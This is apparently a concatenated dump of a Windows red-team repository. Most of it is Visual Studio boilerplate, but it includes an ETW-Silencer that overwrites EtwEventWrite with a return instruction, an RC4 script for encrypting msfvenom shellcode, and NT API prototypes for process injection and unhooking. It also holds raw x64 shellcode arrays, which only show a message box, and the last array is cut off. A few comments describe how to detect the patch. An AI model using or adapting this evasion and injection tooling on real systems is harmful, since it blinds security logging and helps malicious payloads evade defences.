/Powershell_CLM_Bypass/PSLangBypass/PSLangBypass_InstallUtil_Bypass/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("PSLangBypass_InstallUtil_Bypass")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("PSLangBypass_InstallUtil_Bypass")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("9256a08b-3fe0-4746-b6ee-050183c4eafe")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/C++/ServiceShell/messages.h:
--------------------------------------------------------------------------------
1 | // The following are message definitions.
2 | //
3 | // Values are 32 bit values laid out as follows:
4 | //
5 | // 3 3 2 2 2 2 2 2 2 2 2 2 1 1 1 1 1 1 1 1 1 1
6 | // 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0
7 | // +---+-+-+-----------------------+-------------------------------+
8 | // |Sev|C|R| Facility | Code |
9 | // +---+-+-+-----------------------+-------------------------------+
10 | //
11 | // where
12 | //
13 | // Sev - is the severity code
14 | //
15 | // 00 - Success
16 | // 01 - Informational
17 | // 10 - Warning
18 | // 11 - Error
19 | //
20 | // C - is the Customer code flag
21 | //
22 | // R - is a reserved bit
23 | //
24 | // Facility - is the facility code
25 | //
26 | // Code - is the facility's status code
27 | //
28 | //
29 | // Define the facility codes
30 | //
31 | #define FACILITY_SYSTEM 0x0
32 | #define FACILITY_RUNTIME 0x2
33 | #define FACILITY_STUBS 0x3
34 | #define FACILITY_IO_ERROR_CODE 0x4
35 |
36 |
37 | //
38 | // Define the severity codes
39 | //
40 | #define STATUS_SEVERITY_SUCCESS 0x0
41 | #define STATUS_SEVERITY_INFORMATIONAL 0x1
42 | #define STATUS_SEVERITY_WARNING 0x2
43 | #define STATUS_SEVERITY_ERROR 0x3
44 |
45 |
46 | //
47 | // MessageId: SVC_ERROR
48 | //
49 | // MessageText:
50 | //
51 | // An error has occurred (%2).
52 | //
53 | #define SVC_ERROR ((DWORD)0xC0020001L)
54 |
55 | // A message file must end with a period on its own line
56 | // followed by a blank line.
--------------------------------------------------------------------------------
/C++/SysWhispers/SysWhispers.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 | Source Files
23 |
24 |
25 |
26 |
27 | Header Files
28 |
29 |
30 | Header Files
31 |
32 |
33 | Header Files
34 |
35 |
36 |
37 |
38 | Source Files
39 |
40 |
41 |
--------------------------------------------------------------------------------
/shellcodes/MessageBox/messagebox-64.txt:
--------------------------------------------------------------------------------
1 | $ msfvenom -p windows/x64/messagebox text="Hello World \!" -f c
2 | [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
3 | [-] No arch selected, selecting arch: x64 from the payload
4 | No encoder specified, outputting raw payload
5 | Payload size: 292 bytes
6 | Final size of c file: 1252 bytes
7 | unsigned char buf[] =
8 | "\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41\x51"
9 | "\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x3e\x48"
10 | "\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72\x50\x3e\x48"
11 | "\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02"
12 | "\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x3e"
13 | "\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48\x01\xd0\x3e\x8b\x80\x88"
14 | "\x00\x00\x00\x48\x85\xc0\x74\x6f\x48\x01\xd0\x50\x3e\x8b\x48"
15 | "\x18\x3e\x44\x8b\x40\x20\x49\x01\xd0\xe3\x5c\x48\xff\xc9\x3e"
16 | "\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41"
17 | "\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24"
18 | "\x08\x45\x39\xd1\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0"
19 | "\x66\x3e\x41\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e"
20 | "\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41"
21 | "\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
22 | "\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x49\xc7\xc1"
23 | "\x00\x00\x00\x00\x3e\x48\x8d\x95\xfe\x00\x00\x00\x3e\x4c\x8d"
24 | "\x85\x0c\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83\x56\x07\xff"
25 | "\xd5\x48\x31\xc9\x41\xba\xf0\xb5\xa2\x56\xff\xd5\x48\x65\x6c"
26 | "\x6c\x6f\x20\x57\x6f\x72\x6c\x64\x20\x21\x00\x4d\x65\x73\x73"
27 | "\x61\x67\x65\x42\x6f\x78\x00";
--------------------------------------------------------------------------------
/C++/ETW/ETW-Silencer/ETW-Silencer.cpp:
--------------------------------------------------------------------------------
1 | // ETW-Silencer.cpp : This file contains the 'main' function. Program execution begins and ends there.
2 | //
3 |
4 | #include
5 | #include
6 | #include
7 |
8 | using namespace std;
9 |
// GetNTAPIAddress: returns the address of the export NTAPIName in the
// ntdll.dll already loaded in this process, or NULL when the module handle or
// the export cannot be found.
10 | FARPROC GetNTAPIAddress(char* NTAPIName) {
11 |
12 | HMODULE hmodule;
13 | FARPROC address;
14 |
15 | hmodule = GetModuleHandleW(L"ntdll.dll");
16 | if (hmodule == NULL) {
17 | return NULL;
// Unreachable: the return above always leaves the function first.
18 | exit(EXIT_FAILURE);
19 | }
20 |
21 | address = GetProcAddress(hmodule, NTAPIName);
22 | if (address == NULL) {
23 | return NULL;
// Unreachable, as above.
24 | exit(EXIT_FAILURE);
25 | }
26 |
27 | return address;
28 | }
29 |
// ETWSilencer: overwrites the start of ntdll!EtwEventWrite in the current
// process so that it begins with 0xC3 (ret). Returns FALSE if either
// VirtualProtect call fails, TRUE otherwise.
// Presumably the intent is that user-mode callers of EtwEventWrite in this
// process return immediately without emitting an event.
// Defender notes: the change is an in-memory patch of an image-backed page, so
// comparing the loaded EtwEventWrite bytes with the on-disk ntdll.dll exposes
// it, as does monitoring VirtualProtect calls that target ntdll code pages.
// Telemetry produced outside this process (kernel callbacks, the
// Microsoft-Windows-Threat-Intelligence provider) does not go through this
// export and should not be silenced by the patch.
30 | BOOL ETWSilencer() {
// The address is not checked for NULL before it is used below.
31 | LPVOID ETWAddress = GetNTAPIAddress((char*)"EtwEventWrite");
32 |
33 | cout << "[+] EtwEventWrite Address: [ " << ETWAddress << " ]" << endl;
34 | //getchar();
35 |
36 | DWORD oldProtect = 0;
37 | DWORD oldOldProtect = 0;
38 |
39 | const char* ret = "\xc3";
40 |
// `sizeof ret` is the size of the pointer, not of the one-byte opcode, so the
// protection change and the copy both cover pointer-size bytes.
41 | if (!VirtualProtect(ETWAddress, sizeof ret, PAGE_READWRITE, &oldProtect)) {
42 | return FALSE;
// Unreachable after the return above.
43 | exit(EXIT_FAILURE);
44 | }
45 |
// Copies pointer-size bytes from a two-byte string literal ("\xc3" plus NUL).
46 | memcpy(ETWAddress, ret, sizeof ret);
47 |
// Restore the protection that was in place before the patch.
48 | if (!VirtualProtect(ETWAddress, sizeof ret, oldProtect, &oldOldProtect)) {
49 | return FALSE;
// Unreachable after the return above.
50 | exit(EXIT_FAILURE);
51 | }
52 |
53 | return TRUE;
54 | }
55 |
// main: calls ETWSilencer once and reports the outcome on stdout.
// Returns EXIT_FAILURE when the patch routine reports failure, 0 otherwise.
56 | int main()
57 | {
// `success` is never read.
58 | BOOL success = FALSE;
59 |
60 | if (ETWSilencer() == FALSE) {
61 | cout << "[-] Can't silence ETW" << endl;
62 | return EXIT_FAILURE;
63 | }
64 |
65 | cout << "[+] ETW Silenced" << endl;
66 |
67 | return 0;
68 | }
--------------------------------------------------------------------------------
/C++/NT_Shellcoderunner/proto.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 | #include "structs.h"
4 |
5 | // NTAPI Prototypes
6 | typedef NTSTATUS(NTAPI* pfnNtWriteVirtualMemory)(
7 | IN HANDLE ProcessHandle,
8 | IN PVOID BaseAddress,
9 | IN PVOID Buffer,
10 | IN ULONG NumberOfBytesToWrite,
11 | OUT PULONG NumberOfBytesWritten OPTIONAL);
12 |
13 | typedef NTSTATUS(NTAPI* pfnNtAllocateVirtualMemory)(
14 | IN HANDLE ProcessHandle,
15 | IN OUT PVOID* BaseAddress,
16 | IN ULONG ZeroBits,
17 | IN OUT PULONG RegionSize,
18 | IN ULONG AllocationType,
19 | IN ULONG Protect);
20 |
21 | typedef NTSTATUS(NTAPI* pfnNtProtectVirtualMemory)(
22 | IN HANDLE ProcessHandle,
23 | IN OUT PVOID* BaseAddress,
24 | IN OUT PULONG NumberOfBytesToProtect,
25 | IN ULONG NewAccessProtection,
26 | OUT PULONG OldAccessProtection);
27 |
28 | typedef NTSTATUS(NTAPI* pfnRtlCreateUserThread)(
29 | IN HANDLE ProcessHandle,
30 | IN PSECURITY_DESCRIPTOR SecurityDescriptor OPTIONAL,
31 | IN BOOLEAN CreateSuspended,
32 | IN ULONG StackZeroBits,
33 | IN OUT PULONG StackReserved,
34 | IN OUT PULONG StackCommit,
35 | IN PVOID StartAddress,
36 | IN PVOID StartParameter OPTIONAL,
37 | OUT PHANDLE ThreadHandle,
38 | OUT PCLIENT_ID ClientID);
39 |
40 |
41 | typedef NTSTATUS(NTAPI* pfnNtWaitForSingleObject)(
42 | IN HANDLE ObjectHandle,
43 | IN BOOLEAN Alertable,
44 | IN PLARGE_INTEGER TimeOut OPTIONAL);
--------------------------------------------------------------------------------
/C++/API_Hooking/UnHook-Ntdll-Exec/proto.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 | #include "structs.h"
4 |
5 | // NTAPI Prototypes
6 | typedef NTSTATUS(NTAPI* pfnNtWriteVirtualMemory)(
7 | IN HANDLE ProcessHandle,
8 | IN PVOID BaseAddress,
9 | IN PVOID Buffer,
10 | IN ULONG NumberOfBytesToWrite,
11 | OUT PULONG NumberOfBytesWritten OPTIONAL);
12 |
13 | typedef NTSTATUS(NTAPI* pfnNtAllocateVirtualMemory)(
14 | IN HANDLE ProcessHandle,
15 | IN OUT PVOID* BaseAddress,
16 | IN ULONG ZeroBits,
17 | IN OUT PULONG RegionSize,
18 | IN ULONG AllocationType,
19 | IN ULONG Protect);
20 |
21 | typedef NTSTATUS(NTAPI* pfnNtProtectVirtualMemory)(
22 | IN HANDLE ProcessHandle,
23 | IN OUT PVOID* BaseAddress,
24 | IN OUT PULONG NumberOfBytesToProtect,
25 | IN ULONG NewAccessProtection,
26 | OUT PULONG OldAccessProtection);
27 |
28 | typedef NTSTATUS(NTAPI* pfnRtlCreateUserThread)(
29 | IN HANDLE ProcessHandle,
30 | IN PSECURITY_DESCRIPTOR SecurityDescriptor OPTIONAL,
31 | IN BOOLEAN CreateSuspended,
32 | IN ULONG StackZeroBits,
33 | IN OUT PULONG StackReserved,
34 | IN OUT PULONG StackCommit,
35 | IN PVOID StartAddress,
36 | IN PVOID StartParameter OPTIONAL,
37 | OUT PHANDLE ThreadHandle,
38 | OUT PCLIENT_ID ClientID);
39 |
40 |
41 | typedef NTSTATUS(NTAPI* pfnNtWaitForSingleObject)(
42 | IN HANDLE ObjectHandle,
43 | IN BOOLEAN Alertable,
44 | IN PLARGE_INTEGER TimeOut OPTIONAL);
--------------------------------------------------------------------------------
/shellcodes/rc4_encrypt.py:
--------------------------------------------------------------------------------
1 | # https://gist.githubusercontent.com/snovvcrash/3533d950be2d96cf52131e8393794d99/raw/35788127b846c99a72a9fa55b5a5db904764201c/rc4_encrypt.py
2 | #!/usr/bin/env python3
3 |
4 | import sys
5 | from typing import Iterator
6 | from base64 import b64encode
7 |
8 | # Stolen from: https://gist.github.com/hsauers5/491f9dde975f1eaa97103427eda50071
def key_scheduling(key: bytes) -> list[int]:
    """Run the RC4 key-scheduling pass and return the 256-entry state table.

    The table starts as the identity permutation 0..255 and is shuffled by one
    pass that mixes in the key bytes, repeating the key as needed.

    Raises ZeroDivisionError when ``key`` is empty (modulo by ``len(key)``).
    """
    state = list(range(256))
    key_len = len(key)

    mixed = 0
    for pos in range(256):
        mixed = (mixed + state[pos] + key[pos % key_len]) % 256
        # Swap the current slot with the key-dependent slot.
        state[pos], state[mixed] = state[mixed], state[pos]

    return state
20 |
21 |
def stream_generation(sched: list[int]) -> Iterator[bytes]:
    """Endless RC4 keystream generator over the state table ``sched``.

    Each step advances the two indices, swaps the two table entries they point
    at and yields one table entry. The yielded values are ints taken from
    ``sched`` (the ``Iterator[bytes]`` annotation notwithstanding).

    ``sched`` is modified in place as the generator is consumed.
    """
    x = y = 0
    while True:
        x = (x + 1) % 256
        y = (y + sched[x]) % 256
        sched[x], sched[y] = sched[y], sched[x]
        yield sched[(sched[x] + sched[y]) % 256]
31 |
32 |
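def encrypt(plaintext: bytes, key: bytes) -> bytes:
    """XOR ``plaintext`` with the RC4 keystream derived from ``key``.

    RC4 is symmetric, so applying the function again with the same key
    returns the original bytes. RC4 is a deprecated cipher and gives no
    integrity protection; the output should not be treated as protected data.

    Args:
        plaintext: bytes to transform.
        key: non-empty key; an empty key raises ZeroDivisionError in
            ``key_scheduling``.

    Returns:
        A bytes object of the same length as ``plaintext``.
    """
    key_stream = stream_generation(key_scheduling(key))

    # zip() stops when plaintext is exhausted, so exactly one keystream value
    # is drawn per input byte. Building the result in one pass avoids the
    # quadratic cost of appending to an immutable bytes object per byte.
    return bytes(byte ^ pad for byte, pad in zip(plaintext, key_stream))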
43 |
44 |
if __name__ == '__main__':

    # The input file path is the only argument; without it, print usage and stop.
    if not len(sys.argv) >= 2:
        print("Usage: python3 rc4_encrypt.py ")
        sys.exit(1)

    _file = sys.argv[1]

    # msfvenom -p windows/x64/exec CMD=calc.exe -f raw -o calc.bin
    # The key is a constant in this script, so the same literal presumably has
    # to appear in whatever decrypts the output; that makes it a static string
    # to search for.
    with open(_file, 'rb') as f:
        contents = f.read()
        result = encrypt(plaintext=contents, key=b'LK8mT&9o3zShqrc#V2c%tZ^qM#VhQ7DY4QyUxnEQ&6C9zn7i#TD&6j%LTz9QB')

    # Emit the ciphertext as base64 text on stdout.
    print(b64encode(result).decode())
--------------------------------------------------------------------------------
/C++/EarlyBird/EarlyBird.rc:
--------------------------------------------------------------------------------
1 | // Microsoft Visual C++ generated resource script.
2 | //
3 | #include "resource.h"
4 |
5 | #define APSTUDIO_READONLY_SYMBOLS
6 | /////////////////////////////////////////////////////////////////////////////
7 | //
8 | // Generated from the TEXTINCLUDE 2 resource.
9 | //
10 | #include "winres.h"
11 |
12 | /////////////////////////////////////////////////////////////////////////////
13 | #undef APSTUDIO_READONLY_SYMBOLS
14 |
15 | /////////////////////////////////////////////////////////////////////////////
16 | // English (United Kingdom) resources
17 |
18 | #if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENG)
19 | LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_UK
20 | #pragma code_page(1252)
21 |
22 | #ifdef APSTUDIO_INVOKED
23 | /////////////////////////////////////////////////////////////////////////////
24 | //
25 | // TEXTINCLUDE
26 | //
27 |
28 | 1 TEXTINCLUDE
29 | BEGIN
30 | "resource.h\0"
31 | END
32 |
33 | 2 TEXTINCLUDE
34 | BEGIN
35 | "#include ""winres.h""\r\n"
36 | "\0"
37 | END
38 |
39 | 3 TEXTINCLUDE
40 | BEGIN
41 | "\r\n"
42 | "\0"
43 | END
44 |
45 | #endif // APSTUDIO_INVOKED
46 |
47 |
48 | /////////////////////////////////////////////////////////////////////////////
49 | //
50 | // RCDATA
51 | //
52 | IDR_RCDATA1 RCDATA "rcdata1.bin"
53 | #endif // English (United Kingdom) resources
54 | /////////////////////////////////////////////////////////////////////////////
55 |
56 |
57 |
58 | #ifndef APSTUDIO_INVOKED
59 | /////////////////////////////////////////////////////////////////////////////
60 | //
61 | // Generated from the TEXTINCLUDE 3 resource.
62 | //
63 |
64 |
65 | /////////////////////////////////////////////////////////////////////////////
66 | #endif // not APSTUDIO_INVOKED
67 |
68 |
--------------------------------------------------------------------------------
/C++/AES_Process_Injection/AES_Process_Injection.rc:
--------------------------------------------------------------------------------
1 | // Microsoft Visual C++ generated resource script.
2 | //
3 | #include "resource1.h"
4 |
5 | #define APSTUDIO_READONLY_SYMBOLS
6 | /////////////////////////////////////////////////////////////////////////////
7 | //
8 | // Generated from the TEXTINCLUDE 2 resource.
9 | //
10 | #include "winres.h"
11 |
12 | /////////////////////////////////////////////////////////////////////////////
13 | #undef APSTUDIO_READONLY_SYMBOLS
14 |
15 | /////////////////////////////////////////////////////////////////////////////
16 | // English (United Kingdom) resources
17 |
18 | #if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENG)
19 | LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_UK
20 | #pragma code_page(1252)
21 |
22 | #ifdef APSTUDIO_INVOKED
23 | /////////////////////////////////////////////////////////////////////////////
24 | //
25 | // TEXTINCLUDE
26 | //
27 |
28 | 1 TEXTINCLUDE
29 | BEGIN
30 | "resource1.h\0"
31 | END
32 |
33 | 2 TEXTINCLUDE
34 | BEGIN
35 | "#include ""winres.h""\r\n"
36 | "\0"
37 | END
38 |
39 | 3 TEXTINCLUDE
40 | BEGIN
41 | "\r\n"
42 | "\0"
43 | END
44 |
45 | #endif // APSTUDIO_INVOKED
46 |
47 | /////////////////////////////////////////////////////////////////////////////
48 | //
49 | // RCDATA
50 | //
51 | IDR_RCDATA1 RCDATA rcdata1.bin
52 | #endif // English (United Kingdom) resources
53 | /////////////////////////////////////////////////////////////////////////////
54 |
55 |
56 |
57 | #ifndef APSTUDIO_INVOKED
58 | /////////////////////////////////////////////////////////////////////////////
59 | //
60 | // Generated from the TEXTINCLUDE 3 resource.
61 | //
62 |
63 |
64 | /////////////////////////////////////////////////////////////////////////////
65 | #endif // not APSTUDIO_INVOKED
66 |
67 |
--------------------------------------------------------------------------------
/C++/Shellcode_Launcher/Shellcode_Launcher.rc:
--------------------------------------------------------------------------------
1 | // Microsoft Visual C++ generated resource script.
2 | //
3 | #include "resource.h"
4 |
5 | #define APSTUDIO_READONLY_SYMBOLS
6 | /////////////////////////////////////////////////////////////////////////////
7 | //
8 | // Generated from the TEXTINCLUDE 2 resource.
9 | //
10 | #include "winres.h"
11 |
12 | /////////////////////////////////////////////////////////////////////////////
13 | #undef APSTUDIO_READONLY_SYMBOLS
14 |
15 | /////////////////////////////////////////////////////////////////////////////
16 | // English (United Kingdom) resources
17 |
18 | #if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENG)
19 | LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_UK
20 | #pragma code_page(1252)
21 |
22 | #ifdef APSTUDIO_INVOKED
23 | /////////////////////////////////////////////////////////////////////////////
24 | //
25 | // TEXTINCLUDE
26 | //
27 |
28 | 1 TEXTINCLUDE
29 | BEGIN
30 | "resource.h\0"
31 | END
32 |
33 | 2 TEXTINCLUDE
34 | BEGIN
35 | "#include ""winres.h""\r\n"
36 | "\0"
37 | END
38 |
39 | 3 TEXTINCLUDE
40 | BEGIN
41 | "\r\n"
42 | "\0"
43 | END
44 |
45 | #endif // APSTUDIO_INVOKED
46 |
47 |
48 | /////////////////////////////////////////////////////////////////////////////
49 | //
50 | // RCDATA
51 | //
52 | IDR_RCDATA1 RCDATA "rcdata1.bin"
53 | #endif // English (United Kingdom) resources
54 | /////////////////////////////////////////////////////////////////////////////
55 |
56 |
57 |
58 | #ifndef APSTUDIO_INVOKED
59 | /////////////////////////////////////////////////////////////////////////////
60 | //
61 | // Generated from the TEXTINCLUDE 3 resource.
62 | //
63 |
64 |
65 | /////////////////////////////////////////////////////////////////////////////
66 | #endif // not APSTUDIO_INVOKED
67 |
68 |
--------------------------------------------------------------------------------
/C++/Thread_Context/Thread_Context.rc:
--------------------------------------------------------------------------------
1 | // Microsoft Visual C++ generated resource script.
2 | //
3 | #include "resource.h"
4 |
5 | #define APSTUDIO_READONLY_SYMBOLS
6 | /////////////////////////////////////////////////////////////////////////////
7 | //
8 | // Generated from the TEXTINCLUDE 2 resource.
9 | //
10 | #include "winres.h"
11 |
12 | /////////////////////////////////////////////////////////////////////////////
13 | #undef APSTUDIO_READONLY_SYMBOLS
14 |
15 | /////////////////////////////////////////////////////////////////////////////
16 | // English (United States) resources
17 |
18 | #if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENU)
19 | LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
20 | #pragma code_page(1252)
21 |
22 | #ifdef APSTUDIO_INVOKED
23 | /////////////////////////////////////////////////////////////////////////////
24 | //
25 | // TEXTINCLUDE
26 | //
27 |
28 | 1 TEXTINCLUDE
29 | BEGIN
30 | "resource.h\0"
31 | END
32 |
33 | 2 TEXTINCLUDE
34 | BEGIN
35 | "#include ""winres.h""\r\n"
36 | "\0"
37 | END
38 |
39 | 3 TEXTINCLUDE
40 | BEGIN
41 | "\r\n"
42 | "\0"
43 | END
44 |
45 | #endif // APSTUDIO_INVOKED
46 |
47 |
48 | /////////////////////////////////////////////////////////////////////////////
49 | //
50 | // RCDATA
51 | //
52 |
53 | IDR_RCDATA1 RCDATA "rcdata1.bin"
54 |
55 | #endif // English (United States) resources
56 | /////////////////////////////////////////////////////////////////////////////
57 |
58 |
59 |
60 | #ifndef APSTUDIO_INVOKED
61 | /////////////////////////////////////////////////////////////////////////////
62 | //
63 | // Generated from the TEXTINCLUDE 3 resource.
64 | //
65 |
66 |
67 | /////////////////////////////////////////////////////////////////////////////
68 | #endif // not APSTUDIO_INVOKED
69 |
70 |
--------------------------------------------------------------------------------
/shellcodes/MessageBox/messagebox-64-thread.txt:
--------------------------------------------------------------------------------
1 | $ msfvenom -p windows/x64/messagebox text="Hello World \!" exitfunc=thread -f c
2 | [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
3 | [-] No arch selected, selecting arch: x64 from the payload
4 | No encoder specified, outputting raw payload
5 | Payload size: 320 bytes
6 | Final size of c file: 1370 bytes
7 | unsigned char buf[] =
8 | "\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41\x51"
9 | "\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x3e\x48"
10 | "\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72\x50\x3e\x48"
11 | "\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02"
12 | "\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x3e"
13 | "\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48\x01\xd0\x3e\x8b\x80\x88"
14 | "\x00\x00\x00\x48\x85\xc0\x74\x6f\x48\x01\xd0\x50\x3e\x8b\x48"
15 | "\x18\x3e\x44\x8b\x40\x20\x49\x01\xd0\xe3\x5c\x48\xff\xc9\x3e"
16 | "\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41"
17 | "\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24"
18 | "\x08\x45\x39\xd1\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0"
19 | "\x66\x3e\x41\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e"
20 | "\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41"
21 | "\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
22 | "\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x49\xc7\xc1"
23 | "\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a\x01\x00\x00\x3e\x4c\x8d"
24 | "\x85\x28\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83\x56\x07\xff"
25 | "\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48"
26 | "\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13"
27 | "\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x48\x65\x6c\x6c\x6f"
28 | "\x20\x57\x6f\x72\x6c\x64\x20\x21\x00\x4d\x65\x73\x73\x61\x67"
29 | "\x65\x42\x6f\x78\x00";
--------------------------------------------------------------------------------
/C++/SysWhispers/shellcode.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | unsigned char shellcode[] =
4 | "\x48\x83\xEC\x28\x48\x83\xE4\xF0\x48\x8D\x15\x66\x00\x00\x00"
5 | "\x48\x8D\x0D\x52\x00\x00\x00\xE8\x9E\x00\x00\x00\x4C\x8B\xF8"
6 | "\x48\x8D\x0D\x5D\x00\x00\x00\xFF\xD0\x48\x8D\x15\x5F\x00\x00"
7 | "\x00\x48\x8D\x0D\x4D\x00\x00\x00\xE8\x7F\x00\x00\x00\x4D\x33"
8 | "\xC9\x4C\x8D\x05\x61\x00\x00\x00\x48\x8D\x15\x4E\x00\x00\x00"
9 | "\x48\x33\xC9\xFF\xD0\x48\x8D\x15\x56\x00\x00\x00\x48\x8D\x0D"
10 | "\x0A\x00\x00\x00\xE8\x56\x00\x00\x00\x48\x33\xC9\xFF\xD0\x4B"
11 | "\x45\x52\x4E\x45\x4C\x33\x32\x2E\x44\x4C\x4C\x00\x4C\x6F\x61"
12 | "\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x00\x55\x53\x45\x52\x33"
13 | "\x32\x2E\x44\x4C\x4C\x00\x4D\x65\x73\x73\x61\x67\x65\x42\x6F"
14 | "\x78\x41\x00\x48\x65\x6C\x6C\x6F\x20\x77\x6F\x72\x6C\x64\x00"
15 | "\x4D\x65\x73\x73\x61\x67\x65\x00\x45\x78\x69\x74\x50\x72\x6F"
16 | "\x63\x65\x73\x73\x00\x48\x83\xEC\x28\x65\x4C\x8B\x04\x25\x60"
17 | "\x00\x00\x00\x4D\x8B\x40\x18\x4D\x8D\x60\x10\x4D\x8B\x04\x24"
18 | "\xFC\x49\x8B\x78\x60\x48\x8B\xF1\xAC\x84\xC0\x74\x26\x8A\x27"
19 | "\x80\xFC\x61\x7C\x03\x80\xEC\x20\x3A\xE0\x75\x08\x48\xFF\xC7"
20 | "\x48\xFF\xC7\xEB\xE5\x4D\x8B\x00\x4D\x3B\xC4\x75\xD6\x48\x33"
21 | "\xC0\xE9\xA7\x00\x00\x00\x49\x8B\x58\x30\x44\x8B\x4B\x3C\x4C"
22 | "\x03\xCB\x49\x81\xC1\x88\x00\x00\x00\x45\x8B\x29\x4D\x85\xED"
23 | "\x75\x08\x48\x33\xC0\xE9\x85\x00\x00\x00\x4E\x8D\x04\x2B\x45"
24 | "\x8B\x71\x04\x4D\x03\xF5\x41\x8B\x48\x18\x45\x8B\x50\x20\x4C"
25 | "\x03\xD3\xFF\xC9\x4D\x8D\x0C\x8A\x41\x8B\x39\x48\x03\xFB\x48"
26 | "\x8B\xF2\xA6\x75\x08\x8A\x06\x84\xC0\x74\x09\xEB\xF5\xE2\xE6"
27 | "\x48\x33\xC0\xEB\x4E\x45\x8B\x48\x24\x4C\x03\xCB\x66\x41\x8B"
28 | "\x0C\x49\x45\x8B\x48\x1C\x4C\x03\xCB\x41\x8B\x04\x89\x49\x3B"
29 | "\xC5\x7C\x2F\x49\x3B\xC6\x73\x2A\x48\x8D\x34\x18\x48\x8D\x7C"
30 | "\x24\x30\x4C\x8B\xE7\xA4\x80\x3E\x2E\x75\xFA\xA4\xC7\x07\x44"
